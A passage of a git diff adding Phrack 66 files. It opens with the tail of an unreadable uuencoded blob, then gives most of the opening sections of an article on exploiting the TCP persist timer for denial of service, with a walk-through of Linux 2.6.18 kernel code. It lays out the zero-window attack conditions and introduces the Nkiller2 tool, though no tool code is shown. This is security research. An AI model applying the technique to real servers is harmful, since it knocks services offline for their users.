+M.A&;V#["'V%4U03B.C0\??\.F//A_?O*WM:G%V_-YEBDYR.0Q(>3(82*4PCF
+M.'WP(9UK39)3_B:W2H/_TV-CB?__5I^#NV/3I_?_9;G3C?U_N=UIH__?[8C[
+M'T]2?H7I<O0#*(!T?O;ZG'UJ&9+42CSKL3]IS6%%:"WF+\71RK_F_`>[.SS_
+M5N<_<0.@7;C_IZCP2,S_)R@7,\LGJ`1DIOMD3"%T"JB/^0<\(//%]>8^@0J+
+M'3UZ`P[&3^<_DUY+;L*+PF!Z+17JI+$;S,@OPW?#L^/7A$?N/JLW@,/@,"S`
+M=R!XB*`E2<<!+-R_A99'?70Z+=,R6%:#I3L0)R+KM^3]UQ_.SH;O+IK@^08L
+M=1$Z$^K9$,A,I5PZQ'`=@RX#P.A1`AX!^*OPU()&KMLBA(T2_FQJ!C@<W2%T
+M13W#`L\-/#0)NP9/AWI\Z#/=@!$`H2ATZ:\__^E*_8;GOS4-YCQ?_[MMI=?F
+MY[\[8OZ+\]_B_/=W=/X['+$'W+:CW;B$J%NJ?5QUM8\K7?FXDN7L?XT-8.%>
+MV63;]`]AQ=BF^@K)AB;]\<>5AF!:+1^;QDWDE59'^$9IL[9<V:PME[1K`W7&
+M\]IZR`SM5JX'%%)CU62O,:;G@*E_"X&\14)FL5G_CF;]?#,85[_+.:>4<9`=
+M`<.1^5:!(^V/*[,?01<0&HNE37Z45WG6]T!:LEK.B\^4G2G@)VD`E@)=<K<"
+M=K$D[!1%M#E550`4>SPL&:J)_R;^9X:Z7S[6.U``(8<9&501'<E`!QEP!%$;
+MHUT;5'7M\6,_XOZ#N/\@[C^(^P_B_H.X_R#N/XC[#^+^@[C_(.X_B/L/XO[#
+M[?<?;K'`J@I^`G,1PGA?@?@S:K/=A4W\`7%_XKN[/P%!E[&\KD.[9F:K*/&4
+MTT>-QD#<N!`W+L2-"W'C0OR"U+?._\WTT`^^T?E_I=?K9G[_%?/_JMH3^;\_
+M3_[O@7)]V3Q:57*NZEA^V>^\1N?^XZWSA\B0W2<!P,YMP\)R[Y]790MPNJ@@
+M)K32ZMJ:$KDBH0_A[2$!(_V"^1U_)\]>,L/,Z)*SQ\+3)3N[L^OQG]C4`]>J
+MLS9*W"9Q0:+-T5A$Z=[H^M;H1MO\C[++7]SD;Z5GV1]JGS\^Y%RQTY]X9I&7
+M!<X9^_0BT@/VK=PS*^8&<G51=UP7JWRV6W[_L\)KB^Q_ZI2W_&]@_V5%2<Y_
+MJFWV^]\]1=C_)RFMJ>V.=9N@.?("B;\=2A)+E$+)IN[C\@SS0,0(/7Y1*8$M
+MYNQ36+PI!FXT.V+%HZ*RUH74?=(Z-+SXV#EV)+&,/=*6)NTSM,'7(YGU^D,Q
+M1\\!EGI@S$AH3?)`_1P0ID<\A'E&\%"8Z]$X^X!',G"_(DYK!&#M<-^,]U:2
+MO(;>3,N#N/`+A?6"&G,6$K(='M:.I>FAI)EZB>7AHU2\Q!+MA.7:)99)3UA6
+MEBKGI`,&GBG#!A:>&6&H,$L>CSK-@4M@$L317E%$$444440111111!%%%%%$
+4$4444401192_5ODO@VB(&0!X````
+`
+end
+
+--------[ EOF
diff --git a/phrack66/9.txt b/phrack66/9.txt
new file mode 100644
index 0000000..ebbbba6
--- /dev/null
+++ b/phrack66/9.txt
@@ -0,0 +1,3329 @@
+				==Phrack Inc.==
+
+		Volume 0x0d, Issue 0x42, Phile #0x09 of 0x11
+
+|=-----------------------------------------------------------------------=|
+|=--------=[ Exploiting TCP and the Persist Timer Infiniteness ]=--------=|
+|=-----------------------------------------------------------------------=|
+|=---------------=[    By ithilgore                      ]=--------------=|
+|=---------------=[       sock-raw.org                   ]=--------------=|
+|=---------------=[                                      ]=--------------=|
+|=---------------=[    ithilgore.ryu.L@gmail.com         ]=--------------=|
+|=-----------------------------------------------------------------------=|
+
+
+---[ Contents
+
+   1 - Introduction
+
+   2 - TCP Persist Timer Theory
+
+   3 - TCP Persist Timer implementation 
+     3.1 - TCP Timers Initialization
+     3.2 - Persist Timer Triggering
+     3.3 - Inner workings of Persist Timer
+
+   4 - The attack
+     4.1 - Kernel memory exhaustion pitfalls
+     4.2 - Attack Vector
+     4.3 - Test cases
+
+   5 - Nkiller2 implementation
+
+   6 - References
+  
+  
+
+
+--[ 1 - Introduction 
+
+TCP is the main protocol upon which most end-to-end communications take
+place, nowadays. Being introduced a lot of years ago, where security
+wasn't as much a concern, has left it with quite a few hanging
+vulnerabilities. It is not strange that many TCP implementations have
+deviated from the official RFCs, to provide additional protective
+measures and robustness. However, there are still attack vectors which
+can be exploited. One of them is the Persist Timer, which is triggered
+when the receiver advertises a TCP window of size 0. In the following
+text, we are going to analyse, how an old technique of kernel memory
+exhaustion [1] can be amplified, extended and adjusted to other forms of
+attacks, by exploiting the persist timer functionality. Our analysis is 
+mainly going to focus on the Linux (2.6.18) network stack implementation,
+but test cases for *BSD will be included as well. The possibility of 
+exploiting the TCP Persist Timer, was first mentioned at [2].
+A proof-of-concept tool that was developed for the sole purpose of
+demonstrating the above attack will be presented. Nkiller2 is able to 
+perform a generic DoS attack, completely statelessly and with almost no 
+memory overhead, using packet-parsing techniques and virtual states. In
+addition, the amount of traffic created is far less than that of similar
+tools, due to the attack's nature. The main advantage, that makes all the
+difference, is the possibly unlimited prolonging of the DoS attack's
+impact by the exploitation of a perfectly 'expected & normal' TCP Persist
+Timer behaviour.
+
+
+
+--[ 2 - TCP Persist Timer theory 
+
+TCP is based on many timers. One of them is the Persist Timer, which is
+used when the peer advertises a window of size 0. Normally, the receiver
+advertises a zero window, when TCP hasn't pushed the buffered data to the
+user application and thus the kernel buffers reach their initial
+advertised limit. This forces the TCP sender to stop writing data to the
+network, until the receiver advertises a window which has a value greater
+than zero. To accomplish that, the receiver sends an ACK called a window
+update, which has the same acknowledgment number as the one that
+advertised the 0 window (since no new data is effectively acknowledged).
+
+The Persist Timer is triggered when TCP gets a 0 window advertisement for
+the following reason: Suppose the receiver eventually pushes the data
+from the kernel buffers to the user application, and thus opens the
+window (the right edge is advanced). He then sends a window update to the
+sender announcing that it can now receive new data. If this window update
+is lost for any reason, then both ends of the connection would deadlock,
+since the receiver would wait for new data and the sender would wait for
+the now lost window update. To avoid the above situation, the sender
+sets the Perist Timer and if no window update has reached him until it
+expires, then he resends a probe to the peer. As long as the receiver
+keeps advertising a window of size 0, then the sender follows the process
+again. He sets the timer, waits for the window update and resends the
+probe. As long as some of the probes are acknowledged, without necessarily
+having to announce a new window, the process will go on ad infinitum.
+Examples can be found at [3].
+
+Of course, the actual implementation is always more complicated than
+theory. We are going to inspect the Linux implementation of the
+TCP Persist Timer, watch the intricacies unfold and eventually get a
+fairly good perspective on what happens behind the scenes.
+
+
+
+-- [ 3 - TCP Persist Timer implementation 
+
+The following code inspection will mainly focus on the implementation of 
+the TCP Persist Timer on Linux 2.6.18. Many of the TCP kernel functions 
+will be regarded as black-boxes, as their analysis is beyond the scope of
+this paper and would probably require a book by itself. 
+
+
+----[ 3.1 - TCP Timer Initialization
+
+Let's see when and how the main TCP timers are initialized. During the
+socket creation process tcp_v4_init_sock() will call 
+tcp_init_xmit_timers() which in turn calls inet_csk_init_xmit_timers().
+
+
+net/ipv4/tcp_ipv4.c:
+/---------------------------------------------------------------------\
+
+/* NOTE: A lot of things set to zero explicitly by call to
+ *       sk_alloc() so need not be done here.
+ */
+static int tcp_v4_init_sock(struct sock *sk)
+{
+    struct inet_connection_sock *icsk = inet_csk(sk);
+    struct tcp_sock *tp = tcp_sk(sk);
+
+    skb_queue_head_init(&tp->out_of_order_queue);
+    tcp_init_xmit_timers(sk);
+    /* ... */
+
+}
+
+\---------------------------------------------------------------------/
+
+
+net/ipv4/tcp_timer.c:
+/---------------------------------------------------------------------\
+
+void tcp_init_xmit_timers(struct sock *sk)
+{
+    inet_csk_init_xmit_timers(sk, &tcp_write_timer, &tcp_delack_timer,
+                  &tcp_keepalive_timer);
+}
+
+\---------------------------------------------------------------------/
+
+
+As we can see, inet_csk_init_xmit_timers() is the function which actually
+does the work of setting up the timers. Essentially what it does, is to
+assign a handler function to each of the three main timers, as instructed
+by its arguments. setup_timer() is a simple inline function defined at
+"include/linux/timer.h".
+
+
+net/ipv4/inet_connection_sock.c:
+/---------------------------------------------------------------------\
+
+/*
+ * Using different timers for retransmit, delayed acks and probes
+ * We may wish use just one timer maintaining a list of expire jiffies
+ * to optimize.
+ */
+void inet_csk_init_xmit_timers(struct sock *sk,
+                   void (*retransmit_handler)(unsigned long),
+                   void (*delack_handler)(unsigned long),
+                   void (*keepalive_handler)(unsigned long))
+{
+    struct inet_connection_sock *icsk = inet_csk(sk);
+
+    setup_timer(&icsk->icsk_retransmit_timer, retransmit_handler,
+            (unsigned long)sk);
+    setup_timer(&icsk->icsk_delack_timer, delack_handler,
+            (unsigned long)sk);
+    setup_timer(&sk->sk_timer, keepalive_handler, (unsigned long)sk);
+    icsk->icsk_pending = icsk->icsk_ack.pending = 0;
+}
+
+\---------------------------------------------------------------------/
+
+
+include/linux/timer.h:
+/---------------------------------------------------------------------\
+
+static inline void setup_timer(struct timer_list * timer,
+                void (*function)(unsigned long),
+                unsigned long data)
+{
+    timer->function = function;
+    timer->data = data;
+    init_timer(timer);
+}
+
+\---------------------------------------------------------------------/
+
+
+According to the above, the timers will be initialized with the following
+handlers:
+
+retransmission timer -> tcp_write_timer()
+delayed acknowledgments timer -> tcp_delack_timer()
+keepalive timer -> tcp_keepalive_timer()
+
+What interests us, is the tcp_write_timer(), since as we can see from the
+following code, *both* the retransmission timer *and* the persist timer
+are initially handled by the same function before triggering the more
+specific ones. And there is a reason that Linux ties the two timers.
+
+
+net/ipv4/tcp_timer.c:
+/---------------------------------------------------------------------\
+
+static void tcp_write_timer(unsigned long data)
+{
+    struct sock *sk = (struct sock*)data;
+    struct inet_connection_sock *icsk = inet_csk(sk);
+    int event;
+
+    bh_lock_sock(sk);
+    if (sock_owned_by_user(sk)) {
+        /* Try again later */
+        sk_reset_timer(sk, &icsk->icsk_retransmit_timer, 
+            jiffies + (HZ / 20));
+        goto out_unlock;
+    }
+
+    if (sk->sk_state == TCP_CLOSE || !icsk->icsk_pending)
+        goto out;
+
+    if (time_after(icsk->icsk_timeout, jiffies)) {
+        sk_reset_timer(sk, &icsk->icsk_retransmit_timer, 
+            icsk->icsk_timeout);
+        goto out;
+    }
+
+    event = icsk->icsk_pending;
+    icsk->icsk_pending = 0;
+
+    switch (event) {
+    case ICSK_TIME_RETRANS:
+        tcp_retransmit_timer(sk);
+        break;
+    case ICSK_TIME_PROBE0:
+        tcp_probe_timer(sk);
+        break;
+    }
+    TCP_CHECK_TIMER(sk);
+
+out:
+    sk_mem_reclaim(sk);
+out_unlock:
+    bh_unlock_sock(sk);
+    sock_put(sk);
+}
+
+\---------------------------------------------------------------------/
+
+
+Depending on the value of 'icsk->icsk_pending', then either the 
+retransmission_timer real handler -tcp_retransmit_timer()- or the 
+persist_timer real handler -tcp_probe_timer()- is called. 
+ICSK_TIME_RETRANS and ICSK_TIME_PROBE0 are literals defined at 
+"include/net/inet_connection_sock.h" and icsk_pending is an 8bit member
+of a type inet_sock struct which is defined in the same file.
+
+
+include/net/inet_connection_sock.h:
+/---------------------------------------------------------------------\
+
+/** inet_connection_sock - INET connection oriented sock
+ *
+ * @icsk_pending:      Scheduled timer event
+ * ...
+ *
+ */
+
+struct inet_connection_sock {
+    /* inet_sock has to be the first member! */
+    struct inet_sock      icsk_inet;
+    /* ... */
+    __u8              icsk_pending;
+
+    /* ...*/
+}
+
+/* ... */
+
+#define ICSK_TIME_RETRANS   1   /* Retransmit timer */
+#define ICSK_TIME_DACK      2   /* Delayed ack timer */
+#define ICSK_TIME_PROBE0    3   /* Zero window probe timer */
+#define ICSK_TIME_KEEPOPEN  4   /* Keepalive timer */
+
+\----------------------------------------------------------------------/
+
+
+Leaving the initialization process behind, we need to see how we can
+trigger the TCP persist timer.
+
+
+----[ 3.2 - Persist Timer Triggering
+
+Looking through the kernel code for functions that trigger/reset the 
+timers, we fall upon inet_csk_reset_xmit_timer() which is defined at
+"include/net/inet_connection_sock.h"
+
+
+include/net/inet_connection_sock.h:
+/---------------------------------------------------------------------\
+
+/*
+ *  Reset the retransmission timer
+ */
+static inline void inet_csk_reset_xmit_timer(struct sock *sk,
+                         const int what,
+                         unsigned long when,
+                         const unsigned long max_when)
+{
+    struct inet_connection_sock *icsk = inet_csk(sk);
+
+    if (when > max_when) {
+#ifdef INET_CSK_DEBUG
+        pr_debug("reset_xmit_timer: sk=%p %d when=0x%lx, 
+            caller=%p\n", sk, what, when, 
+            current_text_addr());
+#endif
+        when = max_when;
+    }
+
+    if (what == ICSK_TIME_RETRANS || what == ICSK_TIME_PROBE0) {
+        icsk->icsk_pending = what;
+        icsk->icsk_timeout = jiffies + when;
+        sk_reset_timer(sk, &icsk->icsk_retransmit_timer,
+                icsk->icsk_timeout);
+    } else if (what == ICSK_TIME_DACK) {
+        icsk->icsk_ack.pending |= ICSK_ACK_TIMER;
+        icsk->icsk_ack.timeout = jiffies + when;
+        sk_reset_timer(sk, &icsk->icsk_delack_timer, 
+                icsk->icsk_ack.timeout);
+    }
+#ifdef INET_CSK_DEBUG
+    else {
+        pr_debug("%s", inet_csk_timer_bug_msg);
+    }
+#endif
+}
+
+\----------------------------------------------------------------------/
+
+
+An assignment to 'icsk->icsk_pending' is made according to the argument
+'what'. Note the ambiguity of the comment mentioning that the
+retransmission timer is reset. Essentially, however, either the persist
+timer or the retransmission can be reset through this function. In
+addition, the delayed acknowledgement timer, which won't interest us, can
+be reset through the ICSK_TIME_DACK value. So, whenever 
+inet_csk_reset_xmit_timer() is called, it sets the corresponding timer,
+as instructed by argument 'what', to fire up after time 'when' (which
+must be less or equal than 'max_when') has passed. jiffies is a global
+variable which shows the current system uptime in terms of clock ticks
+A good reference, on how timers in general are managed, is [4]. 
+A caller function which sets the argument 'what' as ICSK_TIME_PROBE0 is
+tcp_check_probe_timer().
+
+
+include/net/tcp.h:
+/---------------------------------------------------------------------\
+
+static inline void tcp_check_probe_timer(struct sock *sk, 
+                        struct tcp_sock *tp)
+{
+    const struct inet_connection_sock *icsk = inet_csk(sk);
+    if (!tp->packets_out && !icsk->icsk_pending)
+        inet_csk_reset_xmit_timer(sk, ICSK_TIME_PROBE0,
+                      icsk->icsk_rto, TCP_RTO_MAX);
+}
+
+\----------------------------------------------------------------------/
+
+
+We face two problems before the persist timer can be triggered. First we
+need to pass the check of the if condition in tcp_check_probe_timer():
+
+    if (!tp->packets_out && !icsk->icsk_pending)
+
+tp->packets_out denotes if any packets are in flight and have not yet
+been acknowledged. This means that the advertisement of a 0 window must
+happen after any data we have received has been acknowledged by us (as 
+the receiver) and before the sender starts transmitting any new data.
+The fact that icsk->icsk_pending should be, 0 denotes that any other timer
+has to already have been cleared. This can happen through the function
+inet_csk_clear_xmit_timer() which in our case can be called by
+tcp_ack_packets_out() which is called by tcp_clean_rtx_queue() which is
+called by tcp_ack() which is the main function that deals with incoming
+acks. tcp_ack() is called by tcp_rcv_established(), in turn called by
+tcp_v4_do_rcv(). The only limitation again for tcp_ack_packets_out() to
+call the timer clearing function, is that 'tp->packets_out' should be 0.
+
+
+net/include/inet_connection_sock.h
+/---------------------------------------------------------------------\
+
+static inline void inet_csk_clear_xmit_timer(struct sock *sk, 
+                        const int what)
+{
+    struct inet_connection_sock *icsk = inet_csk(sk);
+    
+    if (what == ICSK_TIME_RETRANS || what == ICSK_TIME_PROBE0) {
+        icsk->icsk_pending = 0;
+#ifdef INET_CSK_CLEAR_TIMERS
+        sk_stop_timer(sk, &icsk->icsk_retransmit_timer);
+#endif
+    /* ... */
+}
+
+\----------------------------------------------------------------------/
+
+
+net/ipv4/tcp_input.c
+/---------------------------------------------------------------------\
+
+static void tcp_ack_packets_out(struct sock *sk, struct tcp_sock *tp)
+{
+    if (!tp->packets_out) {
+        inet_csk_clear_xmit_timer(sk, ICSK_TIME_RETRANS);
+    } else {
+        inet_csk_reset_xmit_timer(sk, ICSK_TIME_RETRANS, 
+            inet_csk(sk)->icsk_rto, TCP_RTO_MAX);
+    }
+}
+
+/* ... */
+
+/* Remove acknowledged frames from the retransmission queue. */
+static int tcp_clean_rtx_queue(struct sock *sk, __s32 *seq_rtt_p)
+{
+
+/* ... */
+    if (acked&FLAG_ACKED) {
+        tcp_ack_update_rtt(sk, acked, seq_rtt);
+        tcp_ack_packets_out(sk, tp);
+        /* ... */
+    }
+/* ... */
+
+}
+
+/* ... */
+
+/* This routine deals with incoming acks, but not outgoing ones. */
+static int tcp_ack(struct sock *sk, struct sk_buff *skb, int flag)
+{
+
+/* ... */
+
+    /* See if we can take anything off of the retransmit queue. */
+    flag |= tcp_clean_rtx_queue(sk, &seq_rtt);
+/* ... */
+
+}
+
+\----------------------------------------------------------------------/
+
+
+The only caller for tcp_check_probe_timer() is __tcp_push_pending_frames()
+which has tcp_push_pending_frames as its wrapper function.
+tcp_push_sending_frames() is called by tcp_data_snd_check() which is
+called by tcp_rcv_established() which as we saw above calls tcp_ack() as
+well.
+
+
+include/net/tcp.h:
+/---------------------------------------------------------------------\
+
+void __tcp_push_pending_frames(struct sock *sk, struct tcp_sock *tp,
+                   unsigned int cur_mss, int nonagle)
+{
+    struct sk_buff *skb = sk->sk_send_head;
+
+    if (skb) {
+        if (tcp_write_xmit(sk, cur_mss, nonagle))
+            tcp_check_probe_timer(sk, tp);
+    }
+}
+
+/* ... */
+
+static inline void tcp_push_pending_frames(struct sock *sk,
+                       struct tcp_sock *tp)
+{
+    __tcp_push_pending_frames(sk, tp, tcp_current_mss(sk, 1),
+                    tp->nonagle);
+}
+
+\----------------------------------------------------------------------/
+
+
+Another problem here is that we have to make tcp_write_xmit() return a
+value different than 0. According to the comments and the last line of
+the function, the only way to return 1 is by having no packets
+unacknowledged (which are in flight) and additionally by having more 
+packets that need to be sent on queue. This means that the data we
+requested needs to be larger than the initial mss, so that at least 2
+packets are needed to be sent. The first will be acknowledged by us
+advertising a zero window at the same time, and after that, there will
+still be at least 1 packet left in the sender queue. There is also the
+chance, that we advertise a zero window before the sender even starts
+sending any data, just after the connection establishment phase, but
+we will see later that this is not a really good practice.
+
+
+net/ipv4/tcp_output.c:
+/---------------------------------------------------------------------\
+
+/* This routine writes packets to the network.  It advances the
+ * send_head.  This happens as incoming acks open up the remote
+ * window for us.
+ *
+ * Returns 1, if no segments are in flight and we have queued segments,
+ * but cannot send anything now because of SWS or another problem.
+ */
+static int tcp_write_xmit(struct sock *sk, unsigned int mss_now, 
+                int nonagle)
+{
+    struct tcp_sock *tp = tcp_sk(sk);
+    struct sk_buff *skb;
+    unsigned int tso_segs, sent_pkts;
+    int cwnd_quota;
+    int result;
+
+    /* If we are closed, the bytes will have to remain here.
+     * In time closedown will finish, we empty the write queue and
+     * all will be happy.
+     */
+    if (unlikely(sk->sk_state == TCP_CLOSE))
+        return 0;
+
+    sent_pkts = 0;
+
+    /* Do MTU probing. */
+    if ((result = tcp_mtu_probe(sk)) == 0) {
+        return 0;
+    } else if (result > 0) {
+        sent_pkts = 1;
+    }
+
+    while ((skb = sk->sk_send_head)) {
+        unsigned int limit;
+
+        tso_segs = tcp_init_tso_segs(sk, skb, mss_now);
+        BUG_ON(!tso_segs);
+
+        cwnd_quota = tcp_cwnd_test(tp, skb);
+        if (!cwnd_quota)
+            break;
+
+        if (unlikely(!tcp_snd_wnd_test(tp, skb, mss_now)))
+            break;
+
+        if (tso_segs == 1) {
+            if (unlikely(!tcp_nagle_test(tp, skb, mss_now,
+                (tcp_skb_is_last(sk, skb) ?
+                nonagle : TCP_NAGLE_PUSH))))
+                break;
+        } else {
+            if (tcp_tso_should_defer(sk, tp, skb))
+                break;
+        }
+
+        limit = mss_now;
+        if (tso_segs > 1) {
+            limit = tcp_window_allows(tp, skb,
+                          mss_now, cwnd_quota);
+
+            if (skb->len < limit) {
+                unsigned int trim = skb->len % mss_now;
+
+                if (trim)
+                    limit = skb->len - trim;
+            }
+        }
+
+        if (skb->len > limit &&
+            unlikely(tso_fragment(sk, skb, limit, mss_now)))
+            break;
+
+        TCP_SKB_CB(skb)->when = tcp_time_stamp;
+
+        if (unlikely(tcp_transmit_skb(sk, skb, 1, GFP_ATOMIC)))
+            break;
+
+        /* Advance the send_head.  This one is sent out.
+         * This call will increment packets_out.
+         */
+        update_send_head(sk, tp, skb);
+
+        tcp_minshall_update(tp, mss_now, skb);
+        sent_pkts++;
+    }
+
+    if (likely(sent_pkts)) {
+        tcp_cwnd_validate(sk, tp);
+        return 0;
+    }
+    return !tp->packets_out && sk->sk_send_head;
+}
+
+\----------------------------------------------------------------------/
+
+
+Looking through tcp_write_xmit(), we can deduce that the only way to make
+it return a value different than 0, is by reaching the last line and at
+the same meeting the above two requirements. Consequently, we need to
+break from the while loop before 'sent_pkts' is increased so that the if
+condition which calls tcp_cwnd_validate() and then causes the function
+to return 0, fails the check. The key is these two lines:
+
+        if (unlikely(!tcp_snd_wnd_test(tp, skb, mss_now)))
+            break;
+
+tcp_snd_wnd_test() is defined as follows:
+
+net/ipv4/tcp_output.c
+/---------------------------------------------------------------------\
+
+/* Does at least the first segment of SKB fit into the send window? */
+static inline int tcp_snd_wnd_test(struct tcp_sock *tp, 
+    struct sk_buff *skb, unsigned int cur_mss)
+{
+    u32 end_seq = TCP_SKB_CB(skb)->end_seq;
+
+    if (skb->len > cur_mss)
+        end_seq = TCP_SKB_CB(skb)->seq + cur_mss;
+
+    return !after(end_seq, tp->snd_una + tp->snd_wnd);
+}
+
+\---------------------------------------------------------------------/
+
+
+To clarify a few things, here is an excerpt from tcp.h which defines the
+macro 'after' and the members of struct tcp_skb_cb which are used inside
+tcp_snd_wnd_test(). 
+
+
+include/net/tcp.h:
+/---------------------------------------------------------------------\
+
+/*
+ * The next routines deal with comparing 32 bit unsigned ints
+ * and worry about wraparound (automatic with unsigned arithmetic).
+ */
+
+static inline int before(__u32 seq1, __u32 seq2)
+{
+        return (__s32)(seq1-seq2) < 0;
+}
+#define after(seq2, seq1)   before(seq1, seq2)
+
+/* ... */
+
+struct tcp_skb_cb {
+    union {
+        struct inet_skb_parm    h4;
+#if defined(CONFIG_IPV6) || defined (CONFIG_IPV6_MODULE)
+        struct inet6_skb_parm   h6;
+#endif
+    } header;   /* For incoming frames      */
+    __u32       seq;        /* Starting sequence number */
+    __u32       end_seq;    /* SEQ + FIN + SYN + datalen    */
+    
+    /* ... */
+
+    __u32       ack_seq;    /* Sequence number ACK'd    */
+};
+
+#define TCP_SKB_CB(__skb)   ((struct tcp_skb_cb *)&((__skb)->cb[0]))
+
+\---------------------------------------------------------------------/
+
+
+So, in theory we need the sequence number which is derived from the sum
+of the current sequence number + the datalength, to be more than the sum
+of the number of unacknowledged data + the send window. A diagram from
+RFC 793 helps clear out some things:
+
+                   1         2          3          4      
+              ----------|----------|----------|---------- 
+                     SND.UNA    SND.NXT    SND.UNA        
+                                          +SND.WND        
+
+        1 - old sequence numbers which have been acknowledged  
+        2 - sequence numbers of unacknowledged data            
+        3 - sequence numbers allowed for new data transmission 
+        4 - future sequence numbers which are not yet allowed  
+
+In practice, the fact the we, as receivers, just advertised a window of
+size 0, makes the snd_wnd 0, which in turn leads the above check in
+succeeding. Things just work by themselves here.
+
+For completeness, we mention that the window is updated by calling the
+function tcp_ack_update_window() (caller is tcp_ack()) which in turns
+updates the tp->snd_wnd variable if the window update is a valid one,
+something which is checked by tcp_may_update_window().
+
+
+net/ipv4/tcp_input.c
+/---------------------------------------------------------------------\
+
+/* Check that window update is acceptable.
+ * The function assumes that snd_una<=ack<=snd_next.
+ */
+static inline int tcp_may_update_window(const struct tcp_sock *tp, 
+    const u32 ack, const u32 ack_seq, const u32 nwin)
+{
+    return (after(ack, tp->snd_una) ||
+        after(ack_seq, tp->snd_wl1) ||
+        (ack_seq == tp->snd_wl1 && nwin > tp->snd_wnd));
+}
+
+/* ... */
+
+/* Update our send window.
+ *
+ * Window update algorithm, described in RFC793/RFC1122 (used in 
+ * linux-2.2 and in FreeBSD. NetBSD's one is even worse.) is wrong.
+ */
+static int tcp_ack_update_window(struct sock *sk, struct tcp_sock *tp,
+                 struct sk_buff *skb, u32 ack, 
+                 u32 ack_seq)
+{
+    int flag = 0;
+    u32 nwin = ntohs(skb->h.th->window);
+
+    if (likely(!skb->h.th->syn))
+        nwin <<= tp->rx_opt.snd_wscale;
+
+    if (tcp_may_update_window(tp, ack, ack_seq, nwin)) {
+        flag |= FLAG_WIN_UPDATE;
+        tcp_update_wl(tp, ack, ack_seq);
+
+        if (tp->snd_wnd != nwin) {
+            tp->snd_wnd = nwin;
+            /* ... */
+        }
+    }
+
+    tp->snd_una = ack;
+
+    return flag;
+}
+
+\---------------------------------------------------------------------/
+
+
+Let's now summarize the above with a graphical representation.
+
+attacker <-------- data --------- sender
+attacker ---- ACK(data), win0 --> sender
+
+What happens on the sender side:
+
+tcp_v4_do_rcv()
+   |
+   |--> tcp_rcv_established()
+          |
+          |--> tcp_ack()
+          |       |
+          |       |--> tcp_ack_update_window() 
+          |       |      | 
+          |       |      |--> tcp_may_update_window()
+          |       |      
+          |       |--> tcp_clean_rtx_queue() 
+          |              |
+          |              |--> tcp_ack_packets_out()
+          |                      |
+          |                      |--> inet_csk_clear_xmit_timer()
+          |         
+          |--> tcp_data_snd_check()
+                  |
+                  |--> tcp_push_sending_frames()
+                         |
+                         |--> __tcp_push_sending_frames()
+                                 |
+                                 |--> tcp_write_xmit()
+                                 |      |
+                                 |      |--> tcp_snd_wnd_test()
+                                 |               
+                                 |--> tcp_check_probe_timer()
+                                        |
+                                        |--> inet_csk_reset_xmit_timer()
+
+
+Time to move on to the more specific internals of the TCP Persist Timer
+itself.
+
+
+
+----[ 3.3 - Inner workings of Persist Timer
+
+tcp_probe_timer() is the actual handler for the TCP persist timer so we
+are going to focus on this one for a while.
+
+
+net/ipv4/tcp_timer.c
+/---------------------------------------------------------------------\
+
+static void tcp_probe_timer(struct sock *sk)
+{
+    struct inet_connection_sock *icsk = inet_csk(sk);
+    struct tcp_sock *tp = tcp_sk(sk);
+    int max_probes;
+
+    if (tp->packets_out || !sk->sk_send_head) {
+        icsk->icsk_probes_out = 0;
+        return;
+    }
+
+    /* *WARNING* RFC 1122 forbids this
+     *
+     * It doesn't AFAIK, because we kill the retransmit timer -AK
+     *
+     * FIXME: We ought not to do it, Solaris 2.5 actually has fixing
+     * this behaviour in Solaris down as a bug fix. [AC]
+     *
+     * Let me to explain. icsk_probes_out is zeroed by incoming ACKs
+     * even if they advertise zero window. Hence, connection is killed
+     * only if we received no ACKs for normal connection timeout. It is
+     * not killed only because window stays zero for some time, window
+     * may be zero until armageddon and even later. We are in full
+     * accordance with RFCs, only probe timer combines both
+     * retransmission timeout and probe timeout in one bottle.  --ANK
+     */
+    max_probes = sysctl_tcp_retries2;
+
+    if (sock_flag(sk, SOCK_DEAD)) {
+        const int alive = ((icsk->icsk_rto << icsk->icsk_backoff)
+            < TCP_RTO_MAX);
+ 
+        max_probes = tcp_orphan_retries(sk, alive);
+
+        if (tcp_out_of_resources(sk, alive || icsk->icsk_probes_out
+            <= max_probes))
+            return;
+    }
+
+    if (icsk->icsk_probes_out > max_probes) {
+        tcp_write_err(sk);
+    } else {
+        /* Only send another probe if we didn't close things up. */
+        tcp_send_probe0(sk);
+    }
+}
+
+\---------------------------------------------------------------------/
+
+
+Commenting on the comments, we stand before a kernel developer
+disagreement on whether or not the implementation deviates from RFC 1122
+(Requirements for Internet Hosts - Communication Layers). The most 
+outstanding point, however, is this remark:
+
+    "It is not killed only because window stays zero for some time, 
+    window may be zero until armageddon and even later."
+
+Indeed, this is part of what we are going to exploit. We shall take
+advantage of a perfectly 'normal' TCP behaviour, for our own purpose.
+Let's see how this works: 'max_probes' is assigned the value of
+'sysctl_tcp_retries2' which is actually a userspace-controlled variable
+from /proc/sys/net/ipv4/tcp_retries2 and which usually defaults to 15.
+
+There are two cases from now on.
+First case: SOCK_DEAD -> The socket is "dead" or "orphan" which usually
+happens when the state of the connection is FIN_WAIT_1 or any other 
+terminating state from the TCP state transition diagram (RFC 793).
+In this case, 'max_probes' gets the value from tcp_orphan_retries() which
+is defined as follows:
+
+
+net/ipv4/tcp_timer.c:
+/---------------------------------------------------------------------\
+
+/* Calculate maximal number or retries on an orphaned socket. */
+static int tcp_orphan_retries(struct sock *sk, int alive)
+{
+    int retries = sysctl_tcp_orphan_retries; /* May be zero. */
+
+    /* We know from an ICMP that something is wrong. */
+    if (sk->sk_err_soft && !alive)
+        retries = 0;
+
+    /* However, if socket sent something recently, select some safe
+     * number of retries. 8 corresponds to >100 seconds with minimal
+     * RTO of 200msec. */
+    if (retries == 0 && alive)
+        retries = 8;
+    return retries;
+
+\---------------------------------------------------------------------/
+
+
+The 'alive' variable is calculated from this line:
+
+        const int alive = ((icsk->icsk_rto << icsk->icsk_backoff)
+            < TCP_RTO_MAX);
+
+TCP_RTO_MAX is the maximum value the retransmission timeout can get
+and is defined at:
+
+
+include/net/tcp.h:
+/---------------------------------------------------------------------\
+
+#define TCP_RTO_MAX ((unsigned)(120*HZ))
+
+\---------------------------------------------------------------------/
+
+
+HZ is the tick rate frequency of the system, which means a period of
+1/HZ seconds is assumed. Regardless of the value of HZ (which is
+varies from one architecture to another), anything that is multiplied
+by it, is transformed to a product of seconds [4]. For example, 120*HZ is
+translated to 120 seconds since we are going to have HZ timer interrupts
+per second.
+
+Consequently, if the retransmission timeout is less than the maximum 
+allowed value of 2 minutes, then 'alive' = 1 and tcp_orphan_retries will
+return 8, even if sysctl_tcp_orphan_retries is defined as 0 (which is
+usually the case as one can see from the proc virtual filesystem:
